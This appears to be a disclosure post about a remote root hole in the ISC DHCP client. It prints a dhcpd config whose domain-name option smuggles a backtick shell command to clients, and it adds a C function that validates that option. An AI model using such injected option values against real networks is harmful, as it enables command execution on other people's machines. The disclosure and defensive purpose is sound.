The ISC DHCP client contains a remote root hole. If the DHCP server gives out addresses containing backticks, shell commands can be run on the clients.
Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client.
I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:

    shared-network LOCAL-NET {
        option domain-name "my.`echo hi > /tmp/oops`.domain";
        option domain-name-servers 192.168.1.3, 192.168.1.5;
        subnet 192.168.1.0 netmask 255.255.255.0 {
            option routers 192.168.1.1;
            range 192.168.1.32 192.168.1.127;
        }
    }

... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..
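
The test above shows a server-supplied domain-name value reaching a shell on the client. As an added example (not code from ISC, OpenBSD or the original post), here is one way a client could allowlist-check that option before any script sees it; the function name dhcp_domain_name_ok and the exact policy are assumptions of this sketch.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: returns 1 if the len-byte option payload is a plain
 * DNS name, 0 otherwise. DHCP options are length-prefixed rather than
 * NUL-terminated, so the length is passed explicitly and an embedded NUL
 * is treated as just another rejected byte. */
int dhcp_domain_name_ok(const unsigned char *buf, size_t len)
{
    size_t i, label_len = 0;

    if (len == 0 || len > 253)          /* DNS name length limit */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = buf[i];

        if (c == '.') {
            /* reject empty labels and labels ending in '-' */
            if (label_len == 0 || buf[i - 1] == '-')
                return 0;
            label_len = 0;
            continue;
        }
        /* Allowlist: ASCII letters, digits, hyphen. Backtick, '$', ';',
         * whitespace, NUL and every other byte fail here. */
        if (!(c < 0x80 && isalnum(c)) && c != '-')
            return 0;
        if (c == '-' && label_len == 0) /* label may not start with '-' */
            return 0;
        if (++label_len > 63)           /* DNS label length limit */
            return 0;
    }
    if (label_len == 0)                 /* single trailing dot is fine */
        return 1;
    return buf[len - 1] != '-';
}

int main(void)
{
    /* The value from the dhcpd config in the post, plus a benign one. */
    const char *samples[] = { "my.`echo hi > /tmp/oops`.domain", "my.domain" };
    for (size_t i = 0; i < 2; i++)
        printf("%-34s %s\n", samples[i],
               dhcp_domain_name_ok((const unsigned char *)samples[i],
                                   strlen(samples[i])) ? "accept" : "reject");
    return 0;
}
```

A rejected value should be dropped from the lease data entirely rather than escaped, so no later consumer has to quote it correctly.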